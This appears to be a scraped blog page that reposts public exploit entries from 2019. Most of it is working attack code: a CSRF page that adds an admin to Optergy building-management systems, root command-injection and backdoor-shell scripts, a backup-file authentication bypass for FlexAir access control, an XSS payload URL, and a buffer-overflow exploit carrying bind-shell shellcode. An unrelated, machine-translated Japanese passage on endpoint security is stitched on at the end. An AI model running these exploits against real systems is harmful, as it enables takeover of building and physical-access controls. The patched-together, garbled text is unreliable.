# Title: Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7273
# Optergy Proton/Enterprise BMS CSRF Add Admin
<!-- CSRF Add Admin Exploit -->
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.232.19/controlPanel/ajax/UserManipulation.html?add" method="POST">
<input type="hidden" name="user.accountEnabled" value="true" />
<input type="hidden" name="user.username" value="testingus" />
<input type="hidden" name="user.password" value="testingus" />
<input type="hidden" name="confirmPassword" value="testingus" />
<input type="hidden" name="user.firstname" value="Tester" />
<input type="hidden" name="user.lastname" value="Testovski" />
<input type="hidden" name="user.companyName" value="TEST Inc." />
<input type="hidden" name="user.address" value="TestStr 17-251" />
<input type="hidden" name="user.emailAddress" value="aa@bb.cc" />
<input type="hidden" name="user.departmentId" value="" />
<input type="hidden" name="user.phoneNumber" value="1112223333" />
<input type="hidden" name="user.mobileNumber" value="1233211234" />
<input type="hidden" name="securityLevel" value="10" />
<input type="hidden" name="user.showBanner" value="true" />
<input type="hidden" name="user.showMenu" value="true" />
<input type="hidden" name="user.showAlarmTab" value="true" />
<input type="hidden" name="user.visibleAlarms" value="0" />
<input type="hidden" name="user.showBookmarks" value="true" />
<input type="hidden" name="user.showNotificationTab" value="true" />
<input type="hidden" name="user.autoDismissFeedback" value="true" />
<input type="hidden" name="user.canChangeBookmarks" value="true" />
<input type="hidden" name="user.canChangePassword" value="true" />
<input type="hidden" name="user.canUpdateProfile" value="true" />
<input type="hidden" name="homepage-text" value="" />
<input type="hidden" name="user.homePageType" value="" />
<input type="hidden" name="user.homePage" value="" />
<input type="hidden" name="background" value="" />
<input type="hidden" name="user.backgroundImage-text" value="" />
<input type="hidden" name="user.backgroundImage" value="" />
<input type="hidden" name="user.backgroundTiled" value="" />
<input type="hidden" name="user.backgroundColour" value="" />
<input type="hidden" name="newMemberships" value="1" />
<input type="hidden" name="user.id" value="" />
<input type="hidden" name="_sourcePage" value="/WEB-INF/jsp/controlPanel/UserAdministration.jsp" />
<input type="hidden" name="__fp" value="user.showBookmarks||user.showNotificationTab||user.emailSystemNotifications||user.addToSiteDirectory||user.showMenu||user.departmentId||user.showAlarmTab||user.smsAlarms||user.showBanner||accountExpires||user.autoDismissFeedback||user.changePasswordOnNextLogin||passwordExpires||user.showUserProfile||user.canUpdateProfile||user.canChangePassword||user.canChangeBookmarks||user.accountEnabled||" />
<input type="hidden" name="newPrivileges" value="7" />
<input type="hidden" name="newPrivileges" value="9" />
<input type="hidden" name="newPrivileges" value="8" />
<input type="hidden" name="newPrivileges" value="10" />
<input type="hidden" name="newPrivileges" value="13" />
<input type="hidden" name="newPrivileges" value="14" />
<input type="hidden" name="newPrivileges" value="12" />
<input type="hidden" name="newPrivileges" value="2" />
<input type="hidden" name="newPrivileges" value="3" />
<input type="hidden" name="newPrivileges" value="4" />
<input type="hidden" name="newPrivileges" value="139" />
<input type="hidden" name="newPrivileges" value="138" />
<input type="hidden" name="newPrivileges" value="141" />
<input type="hidden" name="newPrivileges" value="140" />
<input type="hidden" name="newPrivileges" value="124" />
<input type="hidden" name="newPrivileges" value="128" />
<input type="hidden" name="newPrivileges" value="119" />
<input type="hidden" name="newPrivileges" value="19" />
<input type="hidden" name="newPrivileges" value="17" />
<input type="hidden" name="newPrivileges" value="18" />
<input type="hidden" name="newPrivileges" value="20" />
<input type="hidden" name="newPrivileges" value="21" />
<input type="hidden" name="newPrivileges" value="24" />
<input type="hidden" name="newPrivileges" value="23" />
<input type="hidden" name="newPrivileges" value="132" />
<input type="hidden" name="newPrivileges" value="131" />
<input type="hidden" name="newPrivileges" value="134" />
<input type="hidden" name="newPrivileges" value="147" />
<input type="hidden" name="newPrivileges" value="25" />
<input type="hidden" name="newPrivileges" value="135" />
<input type="hidden" name="newPrivileges" value="105" />
<input type="hidden" name="newPrivileges" value="59" />
<input type="hidden" name="newPrivileges" value="142" />
<input type="hidden" name="newPrivileges" value="28" />
<input type="hidden" name="newPrivileges" value="27" />
<input type="hidden" name="newPrivileges" value="102" />
<input type="hidden" name="newPrivileges" value="31" />
<input type="hidden" name="newPrivileges" value="125" />
<input type="hidden" name="newPrivileges" value="30" />
<input type="hidden" name="newPrivileges" value="108" />
<input type="hidden" name="newPrivileges" value="129" />
<input type="hidden" name="newPrivileges" value="33" />
<input type="hidden" name="newPrivileges" value="34" />
<input type="hidden" name="newPrivileges" value="36" />
<input type="hidden" name="newPrivileges" value="37" />
<input type="hidden" name="newPrivileges" value="38" />
<input type="hidden" name="newPrivileges" value="46" />
<input type="hidden" name="newPrivileges" value="127" />
<input type="hidden" name="newPrivileges" value="41" />
<input type="hidden" name="newPrivileges" value="42" />
<input type="hidden" name="newPrivileges" value="45" />
<input type="hidden" name="newPrivileges" value="44" />
<input type="hidden" name="newPrivileges" value="49" />
<input type="hidden" name="newPrivileges" value="48" />
<input type="hidden" name="newPrivileges" value="112" />
<input type="hidden" name="newPrivileges" value="113" />
<input type="hidden" name="newPrivileges" value="117" />
<input type="hidden" name="newPrivileges" value="115" />
<input type="hidden" name="newPrivileges" value="116" />
<input type="hidden" name="newPrivileges" value="133" />
<input type="hidden" name="newPrivileges" value="51" />
<input type="hidden" name="newPrivileges" value="54" />
<input type="hidden" name="newPrivileges" value="56" />
<input type="hidden" name="newPrivileges" value="55" />
<input type="hidden" name="newPrivileges" value="66" />
<input type="hidden" name="newPrivileges" value="67" />
<input type="hidden" name="newPrivileges" value="60" />
<input type="hidden" name="newPrivileges" value="61" />
<input type="hidden" name="newPrivileges" value="62" />
<input type="hidden" name="newPrivileges" value="68" />
<input type="hidden" name="newPrivileges" value="69" />
<input type="hidden" name="newPrivileges" value="103" />
<input type="hidden" name="newPrivileges" value="104" />
<input type="hidden" name="newPrivileges" value="64" />
<input type="hidden" name="newPrivileges" value="65" />
<input type="hidden" name="newPrivileges" value="71" />
<input type="hidden" name="newPrivileges" value="121" />
<input type="hidden" name="newPrivileges" value="122" />
<input type="hidden" name="newPrivileges" value="85" />
<input type="hidden" name="newPrivileges" value="86" />
<input type="hidden" name="newPrivileges" value="74" />
<input type="hidden" name="newPrivileges" value="76" />
<input type="hidden" name="newPrivileges" value="144" />
<input type="hidden" name="newPrivileges" value="75" />
<input type="hidden" name="newPrivileges" value="77" />
<input type="hidden" name="newPrivileges" value="78" />
<input type="hidden" name="newPrivileges" value="79" />
<input type="hidden" name="newPrivileges" value="73" />
<input type="hidden" name="newPrivileges" value="143" />
<input type="hidden" name="newPrivileges" value="109" />
<input type="hidden" name="newPrivileges" value="110" />
<input type="hidden" name="newPrivileges" value="88" />
<input type="hidden" name="newPrivileges" value="89" />
<input type="hidden" name="newPrivileges" value="90" />
<input type="hidden" name="newPrivileges" value="118" />
<input type="hidden" name="newPrivileges" value="95" />
<input type="hidden" name="newPrivileges" value="93" />
<input type="hidden" name="newPrivileges" value="96" />
<input type="hidden" name="newPrivileges" value="94" />
<input type="hidden" name="newPrivileges" value="92" />
<input type="hidden" name="newPrivileges" value="98" />
<input type="hidden" name="newPrivileges" value="99" />
<input type="hidden" name="newPrivileges" value="146" />
<input type="hidden" name="newPrivileges" value="100" />
<input type="submit" value="Forgery" />
</form>
</body>
</html>
.png.c9b8f3e9eda461da3c0e9ca5ff8c6888.png)
A group blog by Leader in
Hacker Website - Providing Professional Ethical Hacking Services
-
Entries
16114 -
Comments
7952 -
Views
863595183
Contributors to this blog
-
16114
About this blog
Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.
Entries in this blog
# Exploit Title: FlexAir Access Control 2.4.9api3 - Remote Code Execution
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.4.9api3
# Tested on: NA
# CVE : CVE-2019-9189
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# PoC
#!/bin/bash
#
# Command injection with root privileges in FlexAir Access Control (Prima Systems)
# Firmware version: <= 2.3.38
#
# Discovered by Sipke Mellema
# Updated: 14.01.2019
#
##########################################################################
#
# $ ./Nova2.3.38_cmd.sh 192.168.13.37 "id"
# Executing: id
# Output:
# uid=0(root) gid=0(root) groups=0(root),10(wheel)
# Removing temporary file..
# Done
#
##########################################################################
# Output file on the server
OUTPUT_FILE="/www/pages/app/images/logos/output.txt"
# Command to execute
CMD="$2"
# IP address
IP="$1"
# Change HTTP to HTTPS if required
HOST="http://${IP}"
# Add output file
CMD_FULL="${CMD}>${OUTPUT_FILE}"
# Command injection payload. Be careful with single quotes!
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;${CMD_FULL}'/></request></requests>"
# Perform exploit
echo "Executing: ${CMD}"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
# Get output
echo "Output:"
curl -s "${HOST}/app/images/logos/output.txt"
# Remove temp file
echo "Removing temporary file.."
PAYLOAD="<requests><request name='LoginUser'><param name='UsrName' value='test'/><param name='UsrEMail' value='test@test.com'/><param name='GoogleAccessToken' value='test;rm /www/pages/app/images/logos/output.txt'/></request></requests>"
curl --silent --output /dev/null -X POST -d "${PAYLOAD}" "${HOST}/bin/sysfcgi.fx"
echo "Done"
# Title: Optergy 2.3.0a - Username Disclosure
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7272
# PoC:
curl -s http://192.168.232.19/Login.html?showReset=true | grep 'option value='
<option value="80">djuro</option>
<option value="99">teppi</option>
<option value="67">view</option>
<option value="3">alerton</option>
<option value="59">stef</option>
<option value="41">humba</option>
<option value="25">drmio</option>
<option value="11">de3</option>
<option value="56">andri</option>
<option value="6">myko</option>
<option value="22">dzonka</option>
<option value="76">kosto</option>
<option value="8">beebee</option>
<option value="1">Administrator</option>
# Exploit Title: RTK IIS Codec Service 6.4.10041.133 - 'RtkI2SCodec' Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage:https://www.realtek.com/en/
# Software Link: https://support.hp.com/mx-es/drivers/selfservice/hp-spectre-13-4000-x360-convertible-pc/7527520/model/7835502?sku=K8N38LA
# Version: 6.4.10041.133
# Tested on: Windows 10 Home Single Language
# CVE : N/A
# Explot-Realtek.txt
#Service Info:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
RTK IIS Codec Service RtkI2SCodec C:\Program Files\Realtek\Audio\IIS\RtkI2SAudioService64.exe Auto
C:\Users\user>sc query RtkI2SCodec
NOMBRE_SERVICIO: RtkI2SCodec
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIÓN_INICIO : 0x0
# Title: Optergy 2.3.0a - Remote Code Execution
# Author: LiquidWorm
# Date: 2019-11-05
# Vendor: https://optergy.com/
# Product web page: https://optergy.com/products/
# Affected version: <=2.3.0a
# Advisory: https://applied-risk.com/resources/ar-2019-008
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
# CVE: CVE-2019-7276
# PoC:
#!/usr/bin/env python
#
# Unauthenticated Remote Root Exploit in Optergy BMS (Console Backdoor)
#
# Affected version <=2.0.3a (Proton and Enterprise)
#
##############################################################################
#
# lqwrm@metalgear:~/stuff/optergy$ python getroot.py 192.168.232.19
# Challenge received: 1547540929287
# SHA1: 56a6e5bf103591ed45faa2159cae234d04f06d93
# MD5 from SHA1: 873efc9ca9171d575623a99aeda44e31
# Answer: 56a6e5bf103591ed45faa2159cae234d04f06d93873efc9ca9171d575623a99aeda44e31
# # id
# uid=0(root) gid=0(root) groups=0(root)
#
##############################################################################
#
#
import os#######
import sys######
import json#####
import hashlib##
import requests#
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '\n\x20\x20[*] Usage: '+piton+' <ip:port>\n'
sys.exit()
while True:
challenge_url = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html?get'
try:
req1 = requests.get(challenge_url)
get_challenge = json.loads(req1.text)
challenge = get_challenge['response']['message']
print 'Challenge received: ' + challenge
hash_object = hashlib.sha1(challenge.encode())
print 'SHA1: '+(hash_object.hexdigest())
h1 = (hash_object.hexdigest())
hash_object = hashlib.md5(h1.encode())
print 'MD5 from SHA1: '+(hash_object.hexdigest())
h2 = (hash_object.hexdigest())
print 'Answer: '+h1+h2
zeTargets = 'http://'+sys.argv[1]+'/tools/ajax/ConsoleResult.html'
zeCommand = raw_input('# ')
if zeCommand.strip() == 'exit':
sys.exit()
zeHeaders = {'User-Agent' : 'BB/BMS-251.4ev4h',
'Accept' : '*/*',
'Accept-Encoding' : 'gzip, deflate',
'Accept-Language' : 'mk-MK,mk;q=1.7',
'Connection' : 'keep-alive',
'Connection-Type' : 'application/x-www-form-urlencoded'}
zePardata = {'command' : 'sudo '+zeCommand,
'challenge' : challenge,
'answer' : h1+h2}
zeRequest = requests.post(zeTargets, headers=zeHeaders, data=zePardata)
get_resp = json.loads(zeRequest.text)
get_answ = get_resp['response']['message']
print get_answ
except Exception:
print '[*] Error!'
break
# Exploit Title: FlexAir Access Control 2.3.35 - Authentication Bypass
# Google Dork: NA
# Date: 2019-11-11
# Exploit Author: LiquidWorm
# Vendor Homepage: https://www.computrols.com/capabilities-cbas-web/
# Software Link: https://www.computrols.com/building-automation-software/
# Version: 2.3.35
# Tested on: NA
# CVE : CVE-2019-7666, CVE-2019-7667
# Advisory: https://applied-risk.com/resources/ar-2019-007
# Paper: https://applied-risk.com/resources/i-own-your-building-management-system
#!/usr/bin/env python
# -*- coding: utf8 -*-
#
# Prima FlexAir Access Control 2.3.35 Database Backup Predictable Name Exploit
# Authentication Bypass (Login with MD5 hash)
#
# Older versions: /links/Nova_Config_2019-01-03.bck
# Older versions: /Nova/assets/Nova_Config_2019-01-03.bck
# Newer versions: /links/Nova_Config_2019-01-03_13-53.pdb3
# Fixed versions: 2.4
#
###################################################################################
#
# lqwrm@metalgear:~/stuff/prima$ python exploitDB.py http://192.168.230.17:8080
# [+] Please wait while fetchin the backup config file...
# [+] Found some juice!
# [+] Downloading: http://192.168.230.17:8080/links/Nova_Config_2019-01-07.bck
# [+] Saved as: Nova_Config_2019-01-07.bck-105625.db
# lqwrm@metalgear:~/stuff/prima$ sqlite3 Nova_Config_2019-01-07.bck-105625.db
# SQLite version 3.22.0 2018-01-22 18:45:57
# Enter ".help" for usage hints.
# sqlite> select usrloginname,usrloginpassword from users where usrid in (1,2);
# superadmin|0dfcfa8cc7fd39d96ffe22dd406b5065
# sysadmin|1af01c4a5a4ec37f451a9feb20a0bbbe
# sqlite> .q
# lqwrm@metalgear:~/stuff/prima$
#
###################################################################################
#
# 11.01.2019
#
import os#######
import sys######
import time#####
import requests#
from datetime import timedelta, date
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
piton = os.path.basename(sys.argv[0])
if len(sys.argv) < 2:
print '[+] Usage: '+piton+' [target]'
print '[+] Target example 1: http://10.0.0.17:8080'
print '[+] Target example 2: https://primanova.tld\n'
sys.exit()
host = sys.argv[1]
def datum(start_date, end_date):
for n in range(int ((end_date - start_date).days)):
yield start_date + timedelta(n)
start_date = date(2017, 1, 1)
end_date = date(2019, 12, 30)
print '[+] Please wait while fetchin the backup config file...'
def spinning_cursor():
while True:
for cursor in '|/-\\':
yield cursor
spinner = spinning_cursor()
for mooshoo in datum(start_date, end_date):
sys.stdout.write(next(spinner))
sys.stdout.flush()
time.sleep(0.1)
sys.stdout.write('\b')
h = requests.get(host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck', verify=False)
if (h.status_code) == 200:
print '[+] Found some juice!'
print '[+] Downloading: '+host+'/links/Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck'
timestr = time.strftime('%H%M%S')
time.sleep(1)
open('Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db', 'wb').write(h.content)
print '[+] Saved as: Nova_Config_'+mooshoo.strftime('%Y-%m-%d')+'.bck-'+timestr+'.db'
sys.exit()
print '[-] No backup for you today. :('
# Exploit Title: Adrenalin Core HCM 5.4.0 - 'ReportID' Reflected Cross-Site Scripting
# Google Dork: NA
# Date: 2018-09-06
# Exploit Author: Rishu Ranjan
# Vendor Homepage: https://www.myadrenalin.com/
# Software Link: https://www.myadrenalin.com/core-hcm/
# Version: 5.4.0 (REQUIRED)
# Tested on: NA
# CVE : CVE-2018-12653
# Type: webapps
# Platform: Multiple
# Description
# ====================
# A Reflected Cross Site Scripting (XSS) Vulnerability was discovered in
# Adrenalin Core HCM v5.4.0 HRMS Software. The user supplied input containing
# malicious JavaScript is echoed back as it is in JavaScript code in an HTML
# response.
URL
====================
https://
<HOST:PORT>/myadrenalin/RPT/SSRSDynamicEditReports.aspx?ReportId=109LWFREPORT.RDL15822%27%3balert(%22Reflected%20XSS%22)%2f%2f773&Export=0
Parameter
====================
ReportId
Attack Type
====================
Remote
CVE Impact Other
====================
Allows an attacker to input malicious JavaScript which can steal cookie,
redirect them to other malicious website, etc.
Reference
====================
https://nvd.nist.gov/vuln/detail/CVE-2018-12653
https://www.knowcybersec.com/2019/02/CVE-2018-12653-reflected-XSS.html
Discoverer
====================
Rishu Ranjan
# Exploit Title: Wondershare Application Framework Service - "WsAppService" Unquote Service Path
# Google Dork: N/A
# Date: 2019-11-11
# Exploit Author: chuyreds
# Vendor Homepage: https://www.wondershare.com/
# Software Link: https://www.wondershare.com/drfone/
# Version: 2.4.3.231
# Tested on: Windows 10 Home Single Language
# CVE : N/A
#Service Info:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\Windows\\" | findstr /i /v """
Wondershare Application Framework Service WsAppService C:\Program Files (x86)\Wondershare\WAF\2.4.3.231\WsAppService.exe Auto
C:\Users\user>sc query WsAppService
NOMBRE_SERVICIO: WsAppService
TIPO : 10 WIN32_OWN_PROCESS
ESTADO : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN)
CÓD_SALIDA_WIN32 : 0 (0x0)
CÓD_SALIDA_SERVICIO: 0 (0x0)
PUNTO_COMPROB. : 0x0
INDICACIÓN_INICIO : 0x0
# Exploit Title: Control Center PRO 6.2.9 - Local Stack Based BufferOverflow (SEH)
# Date: 2019-11-09
# Exploit Author: Samir sanchez garnica @sasaga92
# Vendor Homepage: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610
# Software Link: http://www.webgateinc.com/wgi/eng/products/list.php?ec_idx1=P610&ptype=view&page=&p_idx=90&tab=download&#tabdown
# Version: 6.2.9
# Tested: Windows 10 pro N and Windows XP SP3
# CVE : N/A
#!/usr/bin/python
'''
Existe una vulnerabilidad de desbordamiento de pila, una vez se intenta hacer uso del modulo crear usuario, en el campo username/nombre, copiando una cantidad
considerable de strings, la cual no es controlada por el software y se produce una sobreescritura del SEH)
'''
import sys
import random
import string
import struct
import argparse
def pattern_create(_type,_length):
_type = _type.split(" ")
if _type[0] == "trash":
return _type[1] * _length
elif _type[0] == "random":
return ''.join(random.choice(string.lowercase) for i in range(_length))
elif _type[0] == "pattern":
_pattern = ''
_parts = ['A', 'a', '0']
while len(_pattern) != _length:
_pattern += _parts[len(_pattern) % 3]
if len(_pattern) % 3 == 0:
_parts[2] = chr(ord(_parts[2]) + 1)
if _parts[2] > '9':
_parts[2] = '0'
_parts[1] = chr(ord(_parts[1]) + 1)
if _parts[1] > 'z':
_parts[1] = 'a'
_parts[0] = chr(ord(_parts[0]) + 1)
if _parts[0] > 'Z':
_parts[0] = 'A'
return _pattern
else:
return "Not Found"
def generate_file(_name_file, _payload):
print _payload
print "[+] Creando Archivo malicioso"
_name_file = open(_name_file,"w+")
_name_file.write(_payload)
_name_file.close()
print "[+] Payload de {0} bytes generado, exitosamente.".format(len(_payload))
def main():
_parser = argparse.ArgumentParser()
_parser.add_argument("--os", dest="os", help="introduce el os, win10, winxp", required=True)
_args = _parser.parse_args()
#badchars 0x0a, 0x0d, >= 0x80
_name_exploit = "ControlCenterPRO_v6_2_9.txt"
#sudo ./msfvenom -p windows/meterpreter/bind_tcp LPORT=4444 -e x86/alpha_mixed EXITFUNC=seh -f c -b '\x00\x0a\x0d' BufferRegister=ESP
_shellcode = ("\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
"\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
"\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
"\x50\x38\x41\x42\x75\x4a\x49\x79\x6c\x69\x78\x4e\x62\x37\x70"
"\x43\x30\x45\x50\x31\x70\x6f\x79\x4d\x35\x46\x51\x6f\x30\x50"
"\x64\x4e\x6b\x72\x70\x50\x30\x4e\x6b\x46\x32\x64\x4c\x6e\x6b"
"\x71\x42\x32\x34\x6c\x4b\x61\x62\x34\x68\x66\x6f\x6e\x57\x30"
"\x4a\x76\x46\x76\x51\x49\x6f\x4e\x4c\x47\x4c\x63\x51\x63\x4c"
"\x75\x52\x76\x4c\x35\x70\x49\x51\x58\x4f\x54\x4d\x75\x51\x4b"
"\x77\x6b\x52\x39\x62\x46\x32\x53\x67\x4c\x4b\x50\x52\x76\x70"
"\x4c\x4b\x71\x5a\x77\x4c\x6e\x6b\x42\x6c\x46\x71\x32\x58\x6a"
"\x43\x61\x58\x56\x61\x68\x51\x76\x31\x4c\x4b\x73\x69\x55\x70"
"\x57\x71\x4b\x63\x4e\x6b\x67\x39\x66\x78\x6d\x33\x56\x5a\x32"
"\x69\x6c\x4b\x35\x64\x4c\x4b\x55\x51\x6a\x76\x50\x31\x59\x6f"
"\x4c\x6c\x39\x51\x58\x4f\x64\x4d\x35\x51\x5a\x67\x54\x78\x79"
"\x70\x53\x45\x5a\x56\x67\x73\x71\x6d\x49\x68\x45\x6b\x73\x4d"
"\x31\x34\x63\x45\x68\x64\x51\x48\x4c\x4b\x70\x58\x44\x64\x37"
"\x71\x49\x43\x72\x46\x4c\x4b\x36\x6c\x52\x6b\x4e\x6b\x30\x58"
"\x77\x6c\x36\x61\x4a\x73\x4e\x6b\x77\x74\x4c\x4b\x56\x61\x7a"
"\x70\x6e\x69\x42\x64\x45\x74\x71\x34\x63\x6b\x61\x4b\x51\x71"
"\x52\x79\x52\x7a\x72\x71\x39\x6f\x39\x70\x73\x6f\x51\x4f\x73"
"\x6a\x4e\x6b\x64\x52\x58\x6b\x6c\x4d\x73\x6d\x61\x78\x55\x63"
"\x77\x42\x55\x50\x67\x70\x42\x48\x73\x47\x54\x33\x36\x52\x63"
"\x6f\x46\x34\x73\x58\x52\x6c\x63\x47\x44\x66\x56\x67\x69\x6f"
"\x48\x55\x6d\x68\x5a\x30\x45\x51\x77\x70\x37\x70\x75\x79\x58"
"\x44\x70\x54\x42\x70\x53\x58\x44\x69\x4f\x70\x30\x6b\x57\x70"
"\x39\x6f\x5a\x75\x42\x4a\x34\x4b\x42\x79\x52\x70\x4d\x32\x39"
"\x6d\x62\x4a\x46\x61\x32\x4a\x37\x72\x32\x48\x69\x7a\x66\x6f"
"\x69\x4f\x39\x70\x4b\x4f\x4b\x65\x4e\x77\x30\x68\x47\x72\x63"
"\x30\x52\x31\x33\x6c\x4e\x69\x7a\x46\x61\x7a\x56\x70\x61\x46"
"\x30\x57\x75\x38\x6b\x72\x69\x4b\x44\x77\x73\x57\x79\x6f\x69"
"\x45\x4d\x55\x6b\x70\x63\x45\x46\x38\x52\x77\x50\x68\x38\x37"
"\x48\x69\x45\x68\x4b\x4f\x69\x6f\x59\x45\x46\x37\x52\x48\x71"
"\x64\x68\x6c\x67\x4b\x39\x71\x59\x6f\x6a\x75\x52\x77\x6e\x77"
"\x45\x38\x63\x45\x32\x4e\x42\x6d\x30\x61\x59\x6f\x4e\x35\x31"
"\x7a\x35\x50\x30\x6a\x46\x64\x50\x56\x52\x77\x61\x78\x47\x72"
"\x58\x59\x59\x58\x53\x6f\x39\x6f\x49\x45\x6b\x33\x48\x78\x63"
"\x30\x73\x4e\x64\x6d\x4c\x4b\x56\x56\x53\x5a\x53\x70\x75\x38"
"\x77\x70\x52\x30\x63\x30\x45\x50\x33\x66\x50\x6a\x53\x30\x51"
"\x78\x70\x58\x79\x34\x31\x43\x4a\x45\x79\x6f\x4e\x35\x4e\x73"
"\x56\x33\x51\x7a\x67\x70\x43\x66\x61\x43\x56\x37\x75\x38\x35"
"\x52\x79\x49\x48\x48\x71\x4f\x4b\x4f\x7a\x75\x6e\x63\x6b\x48"
"\x77\x70\x51\x6e\x76\x67\x36\x61\x39\x53\x74\x69\x6b\x76\x44"
"\x35\x78\x69\x7a\x63\x6f\x4b\x59\x6e\x76\x6e\x30\x32\x6b\x5a"
"\x61\x7a\x33\x30\x56\x33\x39\x6f\x78\x55\x63\x5a\x65\x50\x79"
"\x53\x41\x41")
_offset = 664
_padding = 40000
_nseh = "\x42\x42\x77\x08"
_seh = struct.pack("<L", 0x637c1571) #0x0258107E pop edi # pop esi # retn lib_VoiceEngine_dll32.dll 3 8 one-reg, stack edi, esi nonull, ascii
if _args.os.lower() == "win10":
_esp_prepend = "\x54\x58\x66\x05\x34\x18\x50\x5C"
_inject = pattern_create("trash A",_offset)
_inject += _nseh
_inject += _seh
_inject += "A" * 4
_inject += _esp_prepend
_inject += _shellcode
_inject += pattern_create("trash D",_padding-len(_inject))
elif _args.os.lower() == "winxp":
_esp_prepend = "\x54\x58\x66\x05\x7C\x0C\x50\x5C"
_inject = pattern_create("trash A",_offset)
_inject += _nseh
_inject += _seh
_inject += "A" * 4
_inject += _esp_prepend
_inject += "A" * 16
_inject += _shellcode
_inject += pattern_create("trash D",_padding-len(_inject))
else:
print("[-] os select is not support, select win10 or winxp")
generate_file(_name_exploit, _inject)
if __name__ == "__main__":
main()
イントラネット端子のセキュリティ作業について考えてください
イントラネットオフィスホスト
オフィスホストコンピューターのセキュリティ要件
一般的なオフィスの要件は次のとおりです。
侵入検出と防御(鈍くするために、それは隠れまたは腰の製品であり、一般的に中国のウイルス対策ソフトウェアと統合されています)。
脆弱性保護(パッチング、一般的に中国のソフトウェアキル入力システムに統合されています);
ソフトウェア制御(ソフトウェアセンター機能、一般的にプラットフォームを獲得するのが一般的です);
ロギング;
制御シナリオ(SSIDなど、データリーク防止DLPが禁止されています)
ここでは、ログの要件について説明します。ロギングは、通常、応答を攻撃したときに2つのことを行うことができ、アクティブな攻撃の原因を追跡できます。
ログは、電子メール、プロセス、サービス、コマンドなどを録画できます。
オフィスホストのインストールとオンラインレート改善計画
すべてのスタッフ検査
イントラネットアクセス
仮想デスクトップの背景の強制インストール
仕事の三部作
すべての従業員のインストールを促進します
すべての従業員が再び現れます
脆弱性パッチをプッシュして、リアルタイムログを自動的にインストールして受け入れる
キーコントロールオブジェクト
人事部
法律および財務部門
シニアエグゼクティブジョブグループ
秘書グループアシスタントグループ
投資および資金調達部門
他の主要人員
重要な結果の期待
独立防衛能力が向上しました
脆弱性パッチ修理自動化
安全な機密データストレージ
予測されたウイルスの発生シナリオ
簡素化された攻撃損失の発見
内部および外部サーバー
サーバーのセキュリティ要件
一般的なサーバーの要件は次のとおりです。
Windows Server
パッチのインストールと脆弱性コンポーネントの監視とアップグレード(サーバーは、再起動する必要があり、パッチングの状況が制御不可能であるため、自動アップグレードまたはパッチングを推奨しません)
自律防御機能(ヒップまたはHIDS機能、NIPはネットワークレイヤーでも使用できます)
信頼できるソフトウェアセンター(ソフトウェアコントロール)
ログ監視
unixlike server
脆弱性監視と修理(監視下での手動アップグレード、POCと組み合わせた欠落スキャンエンジンを使用することをお勧めします)
自律防御モジュール(hipsまたはhids機能、NIPはネットワークレイヤーでも使用できます)
信頼できるソフトウェア監視(公式のアプリストアまたは公式ソースを使用)
ログ監視
解決策
優れたインストールテンプレートを開発します(パッチウェル、必要なプログラムソフトウェアをインストールし、ログをコレクションプラットフォームに合わせます)
オンラインインストールの要件は、インストールテンプレートに基づいている必要があります
Unixlike System Serversが脆弱性修復のクローズドループを形成するための効果的なミスカニングメカニズムを確立し、Windowsシステムにも効果的です。また、自己開発のサーバーガードプログラムと統一された制御プラットフォーム管理(統一された脆弱性修復)をインストールまたは開発することもお勧めします。
すべてのログは、統一されたログ管理とアラームの自動分析に構成されています。
キー保証オブジェクト
ドメインコントロール、RADIUSサーバー、SSOシングルサインオンサーバーなどの認証サーバー。
ルーター、スイッチ、ファイアウォール、DHCPサーバー、DNSサーバーなどの主要なネットワーク機器。
金融システム、人事システム、給与システム、採用システム、法制度、特許システム、ドキュメントシステム(契約、契約、入札書類)などの主要なシステム。
ソースコードバージョンコントローラー、重要な産業制御生産機器およびその他の生産要因。
